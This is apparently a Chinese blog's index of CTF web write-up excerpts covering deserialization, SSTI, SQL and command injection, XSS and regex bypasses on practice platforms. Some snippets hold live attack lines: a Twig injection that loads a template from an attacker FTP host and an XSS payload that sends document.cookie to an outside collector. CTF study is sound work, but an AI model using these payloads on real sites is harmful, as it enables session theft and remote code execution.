![](https://img-blog.csdnimg.cn/20201014180756916.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
Write Up
文章平均质量分 56
-
車鈊
热爱编程,正在钻研网络安全方向,欢迎来交流啊。
展开
-
[BUU/Pickle/JWT] [CISCN2019 华北赛区 Day1 Web2]ikun
[CISCN2019 华北赛区 Day1 Web2]ikun能做出这道题的,一定是狂热ikun吧(滑稽业务逻辑漏洞import requestsurl = "http://ed0b4ae6-27c4-46f2-9281-8b0b0335be34.node4.buuoj.cn:81/shop?page="for i in range(200): if "lv6.png" in requests.get(url+str(i)).text: print(i)运行结果181原创 2022-03-23 10:31:48 · 1157 阅读 · 0 评论 -
[Web/反序列化]青龙组AreUSerialz+朱雀组-phpweb
反序列化两道题目难度不大,但也要认真审计青龙组AreUSerialz源码 <?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename原创 2022-03-12 16:11:46 · 701 阅读 · 0 评论 -
[WP/Bilibili]程序员节Bilibili-sec1024安全题目
一年一度的BILIBILICTF又开始了。文章目录第一题第二题第三题第四题第五题主体窗口加密部分跑出原始字符串第六题第七题第一题1024程序员节,大家一起和2233参与解密游戏吧~happy_1024_2233:e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d3640408abca7deabb96a58f50471171b60e02b1a8dbd32db156第二题配置错误导致webpack泄露第三题<?php /*原创 2021-10-30 11:13:04 · 440 阅读 · 0 评论 -
[WP/命令注入]DASCTF Oct X 吉林工师 WEB1
DASCTF Oct X 吉林工师WEB1迷路的魔法少女:魔法少女迷失在了代码空间 请寻找她现在在哪源码 <?phphighlight_file('index.php');extract($_GET);error_reporting(0);function String2Array($data){ if($data == '') return array(); @eval("\$array = $data;"); return $array;}if(原创 2021-10-26 18:37:19 · 313 阅读 · 2 评论 -
[WP/WEB/反序列化/未完]CTFshow-web257-268
Web257<?phpclass ctfShowUser{ private $username='xxxxxx'; private $password='xxxxxx'; private $isVip=false; private $class = 'info'; public function __construct(){ $this->class=new backDoor(); } public function原创 2021-10-12 00:05:45 · 953 阅读 · 0 评论 -
[WP/Buu/RCE]-[CISCN 2019 初赛]Love Math
[CISCN 2019 初赛]Love Math源码 <?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); }原创 2021-08-08 10:55:32 · 182 阅读 · 0 评论 -
[WP/BUU/SSRF/SQLI/反序列化] [网鼎杯 2018]Fakebook解题+分析
[网鼎杯 2018]Fakebook扫描测试,robots.txt 可读User-agent: *Disallow: /user.php.bak下载,源代码展示了UserInfo类,<?phpclass UserInfo{ public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) {原创 2021-07-31 05:23:12 · 257 阅读 · 0 评论 -
[WP/BUU/Unicode编码]BUUCTF Unicorn shop题解
[ASIS 2019]Unicorn shop测试商店页面,逻辑大致为输入相应的商品号和支付金额购买商品,用1号商品抓包测试,错误的商品,继续测试2、3均如此,直到4正常了但是钱不够,输入更多钱仅允许一个字符输入分析9999为四个字符,编码后也是如此9999%u0039%u0039%u0039%u0039因此,我们需要找到一个代指的数字超过1337.0的单个字符,我们从Unicode编码库中寻找https://www.compart.com/en/unicode/%u2原创 2021-07-31 05:21:19 · 365 阅读 · 0 评论 -
[WP/BUU/CTF]Cookie Store 题解
简单题,涉及Cookie的使用方法存储-Cookie-session-值base64解码eyJtb25leSI6IDUwLCAiaGlzdG9yeSI6IFtdfQ==// 解码{"money": 50, "history": []}后台通过base64存储用户信息,是及其危险的,可以伪造数据{"money": 100, "history": []}// 编码eyJtb25leSI6IDEwMCwgImhpc3RvcnkiOiBbXX0=替换Value,刷新,购买flag即可..原创 2021-07-31 05:18:42 · 448 阅读 · 0 评论 -
[WP/SSTI/PHP_Twig]Cookie is so stable解题/Twig模板注入
[BJDCTF2020]Cookie is so stablePHP-Twig模板注入参考了知乎大佬的文章:https://zhuanlan.zhihu.com/p/28823933通过_self我们可以调用环境变量中的env属性,当PHP打开远程加载文件的参数(allow_url_include)时,问我们可以通过它来实现远程文件包含{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor原创 2021-07-23 01:11:44 · 599 阅读 · 1 评论 -
[WP/CTFshow]XSS Web316-333
CTFSHOW WP题目的原理就是靶机的bot每隔一段时间访问输入的内容,模拟了反射型XSS316.需要配套接收端XSS脚本如果未过滤script且对外部资源加载无限制的情况下,可以指定src为精心准备的JS文件,使其加载,产生携带COOKIE的请求。本解法直接将产生请求写在了表层。<script>document.location.href='http://xxxxxxxxxxxxxxxxxxxx/x.php?1='+document.cookie</script>3原创 2021-07-11 21:44:36 · 1727 阅读 · 2 评论 -
[WP-Buuoj-极客大挑战2019-信息泄露/反序列化]PHP
进入网页,根据提示,估计网站存在备份文件存在任意下载漏洞尝试获取源码常见的网站源码备份文件后缀.rar/.zip/.7z/.tar/.tar.gz/.bak/.swp/.txt/.html/常见的网站源码备份文件名web/website/backup/back/www/wwwroot/temp经过尝试www.zip为该备份,未删除或设置权限,可进行下载操作。tip:也可以尝试使用御剑和disearch进行扫描打开压缩包,得到网站源码分析源码源码核心为2部分index.phpcl.原创 2021-03-13 23:08:00 · 239 阅读 · 4 评论 -
[WP-Bugku积累-正则bypasss] No one knows regex better than me
No one knows regex better than me记Bugku一道关于PHP正则的新加题目题目源码:<?php error_reporting(0);$zero=$_REQUEST['zero'];$first=$_REQUEST['first'];$second=$zero.$first;if(preg_match_all("/Yeedo|wants|a|girl|friend|or|a|flag/i",$second)){ $key=$second;原创 2021-03-04 10:03:26 · 1684 阅读 · 3 评论 -
[WP-SWPU2019]web1/二次注入原理和利用/information_schema的替代方案
二次注入原理查询前对输入进行转义处理,导致注入无法生效。恶意语句插入到了数据库当中,导致恶意数据被读取并进入到SQL查询语句时,进行了数据查询操作,造成了注入,导致了恶意语句的执行。产生原因恶意语句保存到数据库之前,特殊字符会被转义,写入时又复原为原来的数据。默认数据库数据是安全的,没有对取出的数据进行检验。可能场景博客评论系统:添加评论时,用户将信息保存在数据库当中,再次查询时,恶意语句被查询语句引用,造成了二次注入。广告发布:同上登录状态下的密码修改服务(update修改其他用原创 2021-06-12 09:00:50 · 255 阅读 · 2 评论 -
[WP/WEB安全/命令注入]由[网鼎杯 2020 朱雀组]Nmap-总结在线工具注入
在线工具注入总结此道可理解为一种命令注入,凡是依托eval或者提交语句完成的命令执行,如果应用对用户可控的语句信任度过高的话,都会产生注入,这可以作为一些渗透的解题思路。[网鼎杯2020朱雀组]NMAP源码做题中读取到的源码<?phprequire('settings.php');set_time_limit(0);if (isset($_POST['host'])): if (!defined('WEB_SCANS')) { die('Web scans dis原创 2021-06-06 09:55:51 · 425 阅读 · 2 评论 -
[WEB安全/反序列化利用]构造反序列化字符逃逸方法分析
字符逃逸序列化类型:长度(键数):{类型:键长度:键名;类型:值长度:内容;} //本文键和值各自分为三部分,类型、长度、字符串 o:名长:对象名:长度(键数):{类型:键长度:键名;类型:值长度:内容;}一.字符减少型分类值逃逸:值过滤,前值包后键与值(左引号为止)条件为两个连续的键值对,第一个的值包含住第二个的键的全部和值的类型、长度,使第二个键值对产生逃逸覆盖不可控参数【主要为长度这一数字,利用可传参数的前一参数被过滤或替换的逻辑,计算其长度,使伪造数据闭合】原创 2021-06-09 19:08:09 · 211 阅读 · 0 评论 -
【WP】CISCN2021初赛-WEB部分
WEBEasysql模糊测试发现columns,information,union(大小写)被过滤报错回显点UNION联合注入无法使用,测试登录发现报错点回显位和库名我们采用报错注入,用and做语法连接// 测试列数wyx123')and(select 1)#// 爆破库名wyx123')and(select updatexml(1,concat(0x7e,database(),0x7e),1))#列名的猜解-无列名注入当我们构造连接查询,对其加上using限制(using:原创 2021-06-06 00:38:11 · 780 阅读 · 0 评论 -
【WP】[VNCTF 2021]Ez_game
[VNCTF 2021]Ez_game打开为一个小游戏,查看调试器,发现了三个js文件,在game.js中发现如下的语句function Update(){ ++levelFrame; UpdateAudio(); // save data if (!speedRunMode) localStorage.kbap_coins = playerData.coins; // update speed run time原创 2021-06-06 00:29:04 · 592 阅读 · 2 评论 -
【WP】2021虎符
签到原理原型为PHP官方GIT服务器近日被植入的后门。zval *enc;// 检测user_agenttif ((Z_TYPE(PG(http_globals)[TRACK_VARS_SERVER]) == IS_ARRAY || zend_is_auto_global_str(ZEND_STRL("_SERVER")))&& (enc = zend_hash_str_find(Z_ARRVAL(PG(http_globals)[TRACK_VARS_SERVER])原创 2021-06-06 00:24:44 · 281 阅读 · 2 评论 -
【WP】DASCTF2021
补发WPez_serialize源码<?phperror_reporting(0);highlight_file(__FILE__);class A{ public $class; public $para; public $check; public function __construct() { $this->class = "B"; $this->para = "ctfer"; e原创 2021-06-06 00:21:58 · 837 阅读 · 0 评论 -
CTFshow菜鸡杯WP
WEBWEB1 签到<?phpif(isset($_GET['url'])){ switch (strtolower(substr($_GET['url'], 0,4))) { case 'file': echo 'file protocol do not allow'; break; case 'php:': echo 'php protocol do not allow';原创 2020-08-30 19:25:13 · 983 阅读 · 0 评论